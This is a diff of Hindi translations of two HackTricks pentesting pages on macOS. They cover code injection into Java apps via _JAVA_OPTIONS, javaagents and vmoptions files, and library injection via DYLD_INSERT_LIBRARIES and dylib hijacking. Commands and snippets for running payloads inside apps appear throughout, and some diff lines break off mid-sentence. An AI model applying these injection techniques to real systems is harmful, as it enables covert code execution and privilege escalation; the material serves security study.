-* **अपनी हैकिंग ट्रिक्स साझा करें, [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके।**
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**.
+* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।

 </details>

@ -30,7 +32,7 @@ sudo find / -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null
 export _JAVA_OPTIONS='-Xms2m -Xmx5m -XX:OnOutOfMemoryError="/tmp/payload.sh"'
 "/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
 ```
-इसे नई प्रक्रिया के रूप में चलाने के लिए और वर्तमान टर्मिनल की चाइल्ड के रूप में नहीं, आप इसका उपयोग कर सकते हैं:
+इसे वर्तमान टर्मिनल की चाइल्ड के रूप में नहीं बल्कि एक नई प्रक्रिया के रूप में निष्पादित करने के लिए आप इसका उपयोग कर सकते हैं:
 ```objectivec
 #import <Foundation/Foundation.h>
 // clang -fobjc-arc -framework Foundation invoker.m -o invoker
@ -83,7 +85,7 @@ NSMutableDictionary *environment = [NSMutableDictionary dictionaryWithDictionary
 return 0;
 }
 ```
-हालांकि, इससे निष्पादित ऐप पर एक त्रुटि उत्पन्न होगी, एक और अधिक गुप्त तरीका है जावा एजेंट बनाना और उपयोग करना है:
+हालांकि, इससे निष्पादित ऐप पर एक त्रुटि उत्पन्न होगी, एक और अधिक गुप्त तरीका है जावा एजेंट बनाना और उपयोग करना:
 ```bash
 export _JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'
 "/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
@ -116,13 +118,13 @@ err.printStackTrace();
 }
 ```
 ```
-एजेंट को कंपाइल करने के लिए चलाएं:
+एजेंट को कंपाइल करने के लिए चलाएँ:
 ```
 ```bash
 javac Agent.java # Create Agent.class
 jar cvfm Agent.jar manifest.txt Agent.class # Create Agent.jar
 ```
-के साथ `manifest.txt`:
+`manifest.txt` के साथ:
 ```
 Premain-Class: Agent
 Agent-Class: Agent
@ -140,12 +142,12 @@ open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Profession
 ```
 ## vmoptions फ़ाइल

-यह फ़ाइल **Java पैरामीटर्स** के निर्दिष्टीकरण का समर्थन करती है जब Java निष्पादित होता है। आप Java पैरामीटर्स को बदलने के लिए पिछली चालों में से कुछ का उपयोग कर सकते हैं और **प्रक्रिया को मनमाने आदेश निष्पादित करने के लिए बना सकते हैं**।\
+यह फ़ाइल **Java पैरामीटर्स** के निर्दिष्टीकरण का समर्थन करती है जब Java निष्पादित होता है। आप Java पैरामीटर्स को बदलने के लिए पिछली कुछ चालों का उपयोग कर सकते हैं और **प्रक्रिया को मनमाने आदेश निष्पादित करने के लिए बना सकते हैं**।\
 इसके अलावा, यह फ़ाइल `include` निर्देशिका के साथ **अन्य फ़ाइलों को भी शामिल कर सकती है**, इसलिए आप शामिल की गई फ़ाइल को भी बदल सकते हैं।

-और भी, कुछ Java ऐप्स **एक से अधिक `vmoptions`** फ़ाइलों को लोड करेंगे।
+और भी, कुछ Java ऐप्स **एक से अधिक `vmoptions` फ़ाइलों को लोड करेंगे**।

-कुछ एप्लिकेशन जैसे कि Android Studio अपने **आउटपुट में यह इंगित करते हैं कि वे इन फ़ाइलों को कहाँ देख रहे हैं**, जैसे कि:
+कुछ एप्लिकेशन जैसे कि Android Studio अपने **आउटपुट में यह इंगित करते हैं कि वे इन फ़ाइलों को कहाँ देख रहे हैं**, जैसे:
 ```bash
 /Applications/Android\ Studio.app/Contents/MacOS/studio 2>&1 | grep vmoptions

@ -156,7 +158,7 @@ open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Profession
 2023-12-13 19:53:23.922 studio[74913:581359] parseVMOptions: /Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions
 2023-12-13 19:53:23.923 studio[74913:581359] parseVMOptions: platform=20 user=1 file=/Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions
 ```
-यदि वे नहीं करते हैं, तो आप इसे आसानी से जांच सकते हैं:
+यदि वे नहीं करते हैं, तो आप इसे आसानी से इसके साथ जांच सकते हैं:
 ```bash
 # Monitor
 sudo eslogger lookup | grep vmoption # Give FDA to the Terminal
@ -164,4 +166,18 @@ sudo eslogger lookup | grep vmoption # Give FDA to the Terminal
 # Launch the Java app
 /Applications/Android\ Studio.app/Contents/MacOS/studio
 ```
-ध्यान दें कि इस उदाहरण में Android Studio **`/Applications/Android Studio.app.vmoptions`** फाइल को लोड करने की कोशिश कर रहा है, एक ऐसी जगह जहां **`admin` समूह के किसी भी उपयोगकर्ता को लिखने की पहुंच है।**
+ध्यान दें कि इस उदाहरण में Android Studio किस प्रकार **`/Applications/Android Studio.app.vmoptions`** फाइल को लोड करने का प्रयास कर रहा है, एक ऐसी जगह जहाँ **`admin` समूह के किसी भी उपयोगकर्ता को लिखने की पहुँच है।**
+
+<details>
+
+<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
+
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **अपनी हैकिंग तरकीबें साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज़ में PRs सबमिट करके।
+
+</details>
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md
@ -1,118 +1,85 @@
-# macOS लाइब्रेरी इंजेक्शन
+# macOS पुस्तकालय इंजेक्शन

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS रेड टीम विशेषज्ञ)</strong></a><strong> के साथ!</strong></summary>

-* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
-* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
-* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का पालन करें**.
-* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके अपना योगदान दें।**
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा [**NFTs**](https://opensea.io/collection/the-peass-family) का विशेष संग्रह
+* 💬 [**Discord समूह में शामिल हों**](https://discord.gg/hRep4RUj7f) या [**telegram समूह**](https://t.me/peass) या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**.
+* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग तरकीबें साझा करें।

 </details>

 {% hint style="danger" %}
-**dyld का कोड ओपन सोर्स है** और इसे [https://opensource.apple.com/source/dyld/](https://opensource.apple.com/source/dyld/) पर ढूंढा जा सकता है और एक **URL का उपयोग करके एक टार डाउनलोड किया जा सकता है** जैसे कि [https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz](https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz)
+**dyld का कोड ओपन सोर्स है** और इसे [https://opensource.apple.com/source/dyld/](https://opensource.apple.com/source/dyld/) में पाया जा सकता है और इसे एक **URL का उपयोग करके** एक tar के रूप में डाउनलोड किया जा सकता है [https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz](https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz)
 {% endhint %}

 ## **DYLD\_INSERT\_LIBRARIES**

-> यह एक कोलन से अलग **डायनामिक लाइब्रेरी की सूची है** जो प्रोग्राम में निर्दिष्ट की गई लाइब्रेरी से पहले लोड होती है। इससे आप पहले से मौजूदा डायनामिक साझा लाइब्रेरी के नए मॉड्यूलों का परीक्षण कर सकते हैं जो फ्लैट-नेमस्पेस इमेजेज़ में उपयोग होते हैं, केवल नए मॉड्यूलों वाली एक अस्थायी डायनामिक साझा लाइब्रेरी लोड करके। ध्यान दें कि यह किसी भी प्रभाव का नहीं होता है जब एक डायनामिक साझा लाइब्रेरी का उपयोग करके दो-स्तरीय नेमस्पेस इमेजेज़ को बनाया जाता है, जब तक DYLD\_FORCE\_FLAT\_NAMESPACE भी उपयोग नहीं किया जाता है।
+> यह एक कोलोन से अलग **डायनामिक पुस्तकालयों की सूची** है जिसे **प्रोग्राम में निर्दिष्ट पुस्तकालयों से पहले लोड किया जाता है**। यह आपको फ्लैट-नेमस्पेस इमेजेस में प्रयुक्त डायनामिक शेयर्ड पुस्तकालयों के मौजूदा मॉड्यूल के नए मॉड्यूल का परीक्षण करने की अनुमति देता है, जिसमें केवल नए मॉड्यूल के साथ एक अस्थायी डायनामिक शेयर्ड पुस्तकालय लोड होता है। ध्यान दें कि इसका कोई प्रभाव नहीं होता है उन इमेजेस पर जो दो-स्तरीय नेमस्पेस इमेजेस का उपयोग करते हैं जब तक कि DYLD\_FORCE\_FLAT\_NAMESPACE का भी उपयोग नहीं किया जाता।

 यह [**LD\_PRELOAD on Linux**](../../../../linux-hardening/privilege-escalation#ld\_preload) की तरह है।

-यह तकनीक एक ASEP तकनीक के रूप में भी **उपयोग की जा सकती है** क्योंकि प्रत्येक स्थापित एप्लिकेशन के पास "Info.plist" नामक एक plist होती है जिसमें `LSEnvironmental` नामक एक कुंजी का उपयोग करके पर्यावरणीय चरों का निर्धारण किया जा सकता है।
+यह तकनीक **ASEP तकनीक के रूप में भी उपयोग की जा सकती है** क्योंकि हर एप्लिकेशन में एक plist होती है जिसे "Info.plist" कहा जाता है जो `LSEnvironmental` कहे जाने वाले कुंजी का उपयोग करके **पर्यावरणीय चर को असाइन करने की अनुमति देती है**।

 {% hint style="info" %}
-2012 से शुरू होकर **Apple ने DYLD\_INSERT\_LIBRARIES की शक्ति को बहुत कम कर दिया है**।
+2012 के बाद से **Apple ने `DYLD_INSERT_LIBRARIES` की शक्ति को काफी कम कर दिया है**।

-कोड पर जाएं और **`src/dyld.cpp`** की जांच करें। फ़ंक्शन **`pruneEnvironmentVariables`** में जाकर आप देख सकते हैं कि **`DYLD_*`** चरों को हटा दिया जाता है।
+कोड पर जाएं और **`src/dyld.cpp` की जांच करें**। **`pruneEnvironmentVariables`** फ़ंक्शन में आप देख सकते हैं कि **`DYLD_*`** चर हटा दिए गए हैं।

-फ़ंक्शन **`processRestricted`** में प्रतिबंध का कारण सेट किया जाता है। उस कोड की जांच करते समय आप देख सकते हैं कि कारण हैं:
+**`processRestricted`** फ़ंक्शन में प्रतिबंध का कारण सेट किया गया है। उस कोड की जांच करके आप देख सकते हैं कि कारण हैं:

 * बाइनरी `setuid/setgid` है
-* मैचो बाइनरी में `__RESTRICT/__restrict` सेक्शन की मौजूदगी।
-* सॉफ़्टवेयर में entitlements (हार्डनेड रनटाइम) हैं जिनमें [`com.apple.security.cs.allow-dyld-environment-variables`](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_allow-dyld-environment-variables) entitlement है
-* एक बाइनरी की entitlements की जांच करें: `codesign -dv --entitlements :- </path/to/bin>`
+* मैको बाइनरी में `__RESTRICT/__restrict` सेक्शन का अस्तित्व है।
+* सॉफ्टवेयर में एंटाइटलमेंट्स (हार्डन्ड रनटाइम) हैं बिना [`com.apple.security.cs.allow-dyld-environment-variables`](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_allow-dyld-environment-variables) एंटाइटलमेंट के
+* बाइनरी के **एंटाइटलमेंट्स की जांच करें** `codesign -dv --entitlements :- </path/to/bin>`
+
+अधिक अपडेटेड संस्करणों में आप इस तर्क को फ़ंक्शन **`configureProcessRestrictions`** के दूसरे भाग में पा सकते हैं। हालांकि, नए संस्करणों में जो कुछ भी किया जाता है वह फ़ंक्शन की **शुरुआती जांच है** (आप iOS या सिमुलेशन से संबंधित ifs को हटा सकते हैं क्योंकि वे macOS में उपयोग नहीं किए जाएंगे।
+{% endhint %}
+
+### पुस्तकालय मान्यता
+
+यहां तक कि अगर बाइनरी **`DYLD_INSERT_LIBRARIES`** env चर का उपयोग करने की अनुमति देती है, अगर बाइनरी लोड करने के लिए पुस्तकालय के हस्ताक्षर की जांच करती है तो वह कस्टम क्या नहीं लोड करेगी।
+
+कस्टम पुस्तकालय लोड करने के लिए, बाइनरी के पास **निम्नलिखित में से एक एंटाइटलमेंट होना चाहिए**:
+
+* &#x20;[`com.apple.security.cs.disable-library-validation`](../../macos-security-protections/macos-dangerous-entitlements.md#com.apple.security.cs.disable-library-validation)
+* [`com.apple.private.security.clear-library-validation`](../../macos-security-protections/macos-dangerous-entitlements.md#com.apple.private.security.clear-library-validation)
+
+या बाइनरी के पास **हार्डन्ड रनटाइम फ्लैग** या **पुस्तकालय मान्यता फ्लैग** नहीं होना चाहिए।
+
+आप जांच सकते हैं कि क्या एक बाइनरी में **हार्डन्ड रनटाइम** है `codesign --display --verbose <bin>` के साथ **`CodeDirectory`** में फ्लैग रनटाइम की जांच करके जैसे: **`CodeDirectory v=20500 size=767 flags=0x10000(runtime) hashes=13+7 location=embedded`**
+
+आप यह भी लोड कर सकते हैं अगर यह **बाइनरी के रूप में ही प्रमाणपत्र के साथ हस्ताक्षरित है**।
+
+इसका उपयोग कैसे करें और प्रतिबंधों की जांच कैसे करें, इसका उदाहरण यहां पाएं:
+
+{% content-ref url="../../macos-dyld-hijacking-and-dyld_insert_libraries.md" %}
+[macos-dyld-hijacking-and-dyld\_insert\_libraries.md](../../macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
+{% endcontent-ref %}

-अद्यतित संस्करणों में आप इस तर्क को फ़ंक्शन **`configureProcessRestrictions`** के दूसरे हिस्से में भी ढूंढ सकते हैं। हालांकि, नए संस्करणों में वह क्या निष्पादित करता है, वह तो फ़ंक्शन के **प्रारंभिक जांचों को हटा दिया जाता है** (आप iOS या सिम्युलेशन से संबंधित ifs को हटा सकते हैं क्योंकि वे macOS में उपयोग नहीं होंग
 ## Dylib हाइजैकिंग

 {% hint style="danger" %}
-ध्यान दें कि **पिछले लाइब्रेरी मान्यता प्रतिबंध भी लागू होती है** ताकि Dylib हाइजैकिंग हमलों को करने के लिए।
+याद रखें कि **पिछली पुस्तकालय मान्यता प्रतिबंध भी लागू होते हैं** Dylib हाइजैकिंग हमलों को करने के लिए।
 {% endhint %}

-विंडोज की तरह, MacOS में आप भी **डायलिब्स को हाइजैक** कर सकते हैं ताकि **एप्लिकेशन** **विचारशील** **कोड** **चला सकें**।\
-हालांकि, MacOS एप्लिकेशनों को लाइब्रेरीज़ लोड करने का तरीका विंडोज की तुलना में **अधिक प्रतिबंधित** है। इसका अर्थ है कि **मैलवेयर** विकासक इस तकनीक का उपयोग अभी भी **छिपाने** के लिए कर सकते हैं, लेकिन इसे उन्नति के लिए उपयोग करने की संभावना कम होती है।
+Windows की तरह, MacOS में भी आप **dylibs को हाइजैक** कर सकते हैं ताकि **एप्लिकेशन** **मनमाने** **कोड को निष्पादित** करें।\
+हालांकि, MacOS एप्लिकेशन द्वारा पुस्तकालयों को **लोड** करने का तरीका Windows की तुलना में **अधिक प्रतिबंधित** है। इसका मतलब है कि **मैलवेयर** डेवलपर्स अभी भी इस तकनीक का उपयोग **चुपके** के लिए कर सकते हैं, लेकिन विशेषाधिकार बढ़ाने के लिए इसका दुरुपयोग करने की संभावना बहुत कम है।

-सबसे पहले, **अधिक सामान्य है** कि **MacOS बाइनरीज़ पूरा पथ दिखाती हैं** जिसमें लोड करने के लिए लाइब्रेरीज़ की जगह दिखाई जाती है। और दूसरा, **MacOS कभी भी** **$PATH** के फ़ोल्डर में लाइब्रेरीज़ खोजता नहीं है।
+सबसे पहले, यह **अधिक सामान्य** है कि MacOS बाइनरी लोड करने के लिए पुस्तकालयों के पूर्ण पथ को इंगित करती है। और दूसरा, **MacOS कभी भी $PATH के फोल्डरों में पुस्तकालयों की खोज नहीं करता है**।

-इस कार्यक्षेत्र से संबंधित **कोड** का **मुख्य** हिस्सा `ImageLoader.cpp` में `ImageLoader::recursiveLoadLibraries` में है।
+**मुख्य** भाग **कोड** से संबंधित इस कार्यक्षमता का है **`ImageLoader::recursiveLoadLibraries`** `ImageLoader.cpp` में।

-मैचो बाइनरी एक लाइब्रेरी लोड करने के लिए उपयोग कर सकते हैं **4 अलग-अलग हेडर कमांड** हैं:
+मैको बाइनरी द्वारा पुस्तकालयों को लोड करने के लिए **4 अलग-अलग हेडर कमांड्स** हो सकते हैं:

-* **`LC_LOAD_DYLIB`** कमांड एक dylib लोड करने के लिए सामान्य कमांड है।
-* **`LC_LOAD_WEAK_DYLIB`** कमांड पिछले कमांड की तरह काम करता है, लेकिन यदि dylib नहीं मिलता है, तो बिना किसी त्रुटि के चलाना जारी रखा जाता है।
-* **`LC_REEXPORT_DYLIB`** कमांड यह प्रॉक्सी करता है (या पुनः निर्यात करता है) एक अलग लाइब्रेरी से प्रतीक।
-* **`LC_LOAD_UPWARD_DYLIB`** कमांड इस्तेमाल किया जाता है जब दो लाइब्रेरीज़ एक-दूसरे पर निर्भर करती हैं (इसे _ऊपरी निर्भरता_ कहा जाता है)।
-
-हालांकि, दो तरह की dylib हाइजैकिंग होती है:
-
-* **हाइजैकिंग लाइब्रेरीज़ की कमी**: इसका अर्थ है कि एप्लिकेशन को एक ऐसी लाइब्रेरी लोड करने की कोशिश करेगा जो कि **LC\_LOAD\_WEAK\_DYLIB** के साथ कॉन्फ़िगर नहीं है। फिर, **यदि हमलावर उस जगह पर एक dylib रखता है जहां लोड होने की उम्मीद है** तो वह लोड हो जाएगी।
-* यह तथ्य कि लिंक "कमजोर" है इसका अर्थ है कि एप्लिकेशन चलती रहेगी भले ही लाइब्रेरी नहीं मिलती हो।
-* इसके संबंधित **कोड** में `ImageLoaderMachO.cpp` के `ImageLoaderMachO::doGetDependentLibraries` फ़ंक्शन में है जहां `lib->required` केवल तब `false` होता है जब `LC_LOAD_WEAK_DYLIB` सच होता है।
-* **बाइनरीज़ में कमजोर लिंक लाइब्रेरीज़ ढूंढें** (आपके पास बाद में हाइजैकिंग लाइब्रेरीज़ बनाने का एक उदाहरण है):
-* ```bash
-otool -l </path/to/bin> | grep LC_LOAD_WEAK_DYLIB -A 5 cmd LC_LOAD_WEAK_DYLIB
-cmdsize 56
-name /var/tmp/lib/libUtl.1.dylib (offset 24)
-time stamp 2 Wed Jun 21 12:23:31 1969
-current version 1.0.0
-compatibility version 1.0.0
-```
-* **@rpath के साथ कॉन्फ़िगर किया गया**: Mach-O बाइनरीज़ में कमांड **`LC_RPATH`** और **`LC_LOAD_DYLIB`** हो सकते हैं। इन कमांडों के **मानों** के आधार पर, लाइब्रेरीज़ **अलग-अलग निर्देशिकाओं** से **लोड** होंगी।
-* **`LC_RPATH`** बाइनरी द्वारा लाइब्रेरीज़ लोड करने के लिए उपयोग किए जाने वाले कुछ फ़ोल्डरों के पथ को समेटता है।
-* **`LC_LOAD_DYLIB`** विशेष लाइब्रेरीज़ को लोड करने क
-* जब पथ **फ्रेमवर्क पथ की तरह दिखता है** (उदा। `/stuff/foo.framework/foo`), अगर **`$DYLD_FRAMEWORK_PATH`** लॉन्च पर सेट किया गया था, तो dyld पहले उस निर्दिष्ट निर्देशिका में फ्रेमवर्क आंशिक पथ (उदा। `foo.framework/foo`) के लिए खोजेगा। अगले, dyld सप्लाइड किया गया पथ को असीमित प्रक्रिया के लिए उपयोग करेगा (संबंधित पथों के लिए मौजूदा काम करने वाली निर्देशिका का उपयोग करते हुए)। अंत में, पुराने बाइनरी के लिए, dyld कुछ फॉलबैक कोशिशें करेगा। अगर लॉन्च पर **`$DYLD_FALLBACK_FRAMEWORK_PATH`** सेट किया गया था, तो dyld उन निर्देशिकाओं में खोजेगा। अन्यथा, यह **`/Library/Frameworks`** (macOS पर अगर प्रक्रिया असीमित है) और फिर **`/System/Library/Frameworks`** में खोजेगा।
-1. `$DYLD_FRAMEWORK_PATH`
-2. सप्लाइड किया गया पथ (अगर प्रक्रिया असीमित है तो मौजूदा काम करने वाली निर्देशिका का उपयोग करते हुए)
-3. `$DYLD_FALLBACK_FRAMEWORK_PATH`
-4. `/Library/Frameworks` (अगर प्रक्रिया असीमित है)
-5. `/System/Library/Frameworks`
-
-{% hint style="danger" %}
-अगर फ्रेमवर्क पथ है, तो इसे हाइजैक करने का तरीका होगा:
-
-* अगर प्रक्रिया **असीमित है**, तो मौजूदा काम करने वाली निर्देशिका से **CWD के अनुपालन का दुरुपयोग** करें (यहां तक कि यदि दस्तावेज़ों में यह कहा नहीं गया है कि प्रक्रिया प्रतिबंधित है तो DYLD\_\* env vars हटा दिए जाते हैं)
-{% endhint %}
-
-* जब पथ में **एक स्लैश होता है लेकिन फ्रेमवर्क पथ नहीं होता है** (अर्थात पूरा पथ या dylib के लिए आंशिक पथ), dlopen() पहले (यदि सेट है) **`$DYLD_LIBRARY_PATH`** में खोजेगा (पथ के पते के लिए पत्ता भाग के साथ)। अगले, dyld **सप्लाइड किया गया पथ की कोशिश करेगा** (केवल असीमित प्रक्रियाओं के लिए मौजूदा काम करने वाली निर्देशिका का उपयोग करते हुए)। अंत में, पुराने बाइनरी के लिए, dyld कुछ फॉलबैक कोशिशें करेगा। अगर लॉन्च पर **`$DYLD_FALLBACK_LIBRARY_PATH`** सेट किया गया था, तो dyld उन निर्देशिकाओं में खोजेगा, अन्यथा, dyld **`/usr/local/lib/`** (अगर प्रक्रिया असीमित है) में खोजेगा, और फिर **`/usr/lib/`** में खोजेगा।
-1. `$DYLD_LIBRARY_PATH`
-2. सप्लाइड किया गया पथ (अगर प्रक्रिया असीमित है तो मौजूदा काम करने वाली निर्देशिका का उपयोग करते हुए)
-3. `$DYLD_FALLBACK_LIBRARY_PATH`
-4. `/usr/local/lib/` (अगर प्रक्रिया असीमित है)
-5. `/usr/lib/`
-
-{% hint style="danger" %}
-अगर नाम में स्लैश है और फ्रेमवर्क नहीं है, तो इसे हाइजैक करने का तरीका होगा:
-
-* अगर बाइनरी **असीमित है** और फिर CWD या `/usr/local/lib` से कुछ लोड करना संभव होगा (या उल्लिखित env variables में से किसी का दुरुपयोग करना)
-{% endhint %}
-
-{% hint style="info" %}
-नोट: **dlopen खोजने को नियंत्रित करने वाले** कोई भी कॉन्फ़िगरेशन फ़ाइलें नहीं हैं।
-
-नोट: अगर मुख्य executable एक **set\[ug]id बाइनरी है या entitlements के साथ codesigned** है, तो **सभी environment variables को अनदेखा किया जाता है**, और केवल पूरा पथ ही उपयोग किया जा सकता है (अधिक विस्तृत जानकारी के लिए [DYLD\_INSERT\_LIBRARIES restrictions की जांच करें](../../macos-dyld-hijacking-and-dyld\_insert\_libraries.md#check-dyld\_insert\_librery-restrictions))
-
-नोट: Apple platforms में 32-बिट और 64-बिट लाइब्रेरीज़ को एकत्रित करने के लिए "universal" फ़ाइलें का उपयोग किया जाता है। इसका मतलब है कि **अलग 32-बिट और 64-बिट खोजने के पथ नहीं होते हैं**।
-
-नोट: Apple platforms पर अधिकांश OS dylibs को dyld कैश में **एकीकृत किया जाता है** और डिस्क पर मौजूद नहीं होते हैं। इसलिए, किसी OS dylib की मौजूदगी की पूर्व-जांच के लिए **`stat()`** को कॉल करना **काम नहीं करेगा**। हालांकि, **`dlopen_preflight()`** एक संगत mach-o फ़ाइल खोजने के लिए **`dlopen()`** के उपयोग करता है।
-{% endhint %}
-
-**पथों की जांच करें**
-
-निम्नलिखित कोड के साथ सभी विकल्पों की जांच करें:
+* **`LC_LOAD_DYLIB`** कमांड एक डायलिब को लोड करने के लिए सामान्य कमांड है।
+* **`LC_LOAD_WEAK_DYLIB`** कमांड पिछले एक की तरह काम करता है, लेकिन अगर डायलिब नहीं मिलती है, तो निष्पादन किसी भी त्रुटि के बिना जारी रहता है।
+* **
 ```c
 // gcc dlopentest.c -o dlopentest -Wl,-rpath,/tmp/test
 #include <dlfcn.h>
@ -155,23 +122,27 @@ fprintf(stderr, "Error loading: %s\n\n\n", dlerror());
 return 0;
 }
 ```
-यदि आप इसे कंपाइल और निष्पादित करते हैं तो आप देख सकते हैं **हर पुस्तकालय की वहाँ असफलतापूर्वक खोजी गई थी**। इसके अलावा, आप **एफएस लॉग को फ़िल्टर कर सकते हैं**:
+यदि आप इसे कंपाइल करके निष्पादित करते हैं, तो आप देख सकते हैं **प्रत्येक लाइब्रेरी को असफलतापूर्वक कहाँ खोजा गया था**। साथ ही, आप **FS लॉग्स को फ़िल्टर** कर सकते हैं:
 ```bash
 sudo fs_usage | grep "dlopentest"
 ```
-## डायल्ड `DYLD_*` और `LD_LIBRARY_PATH` एनवायरनमेंट वेरिएबल को काटें
+## सापेक्ष पथ हाइजैकिंग

-फ़ाइल `dyld-dyld-832.7.1/src/dyld2.cpp` में हमें फ़ंक्शन **`pruneEnvironmentVariables`** मिल सकता है, जो किसी भी एनवायरनमेंट वेरिएबल को हटा देगा जो **`DYLD_`** और **`LD_LIBRARY_PATH=`** से शुरू होता है।
+यदि कोई **विशेषाधिकार प्राप्त बाइनरी/ऐप** (जैसे कि SUID या कुछ बाइनरी जिसमें शक्तिशाली एंटाइटलमेंट्स होते हैं) एक सापेक्ष पथ लाइब्रेरी (उदाहरण के लिए `@executable_path` या `@loader_path` का उपयोग करके) लोड कर रहा है और इसमें **लाइब्रेरी वैलिडेशन अक्षम** है, तो संभव है कि बाइनरी को उस स्थान पर ले जाया जा सकता है जहां हमलावर सापेक्ष पथ लोडेड लाइब्रेरी को **संशोधित कर सकता है**, और प्रक्रिया में कोड इंजेक्ट करने के लिए इसका दुरुपयोग कर सकता है।

-यह विशेष रूप से **suid** और **sgid** बाइनरी के लिए एनवायरनमेंट वेरिएबल **`DYLD_FALLBACK_FRAMEWORK_PATH`** और **`DYLD_FALLBACK_LIBRARY_PATH`** को **null** पर सेट करेगा।
+## `DYLD_*` और `LD_LIBRARY_PATH` env वेरिएबल्स को प्रून करें

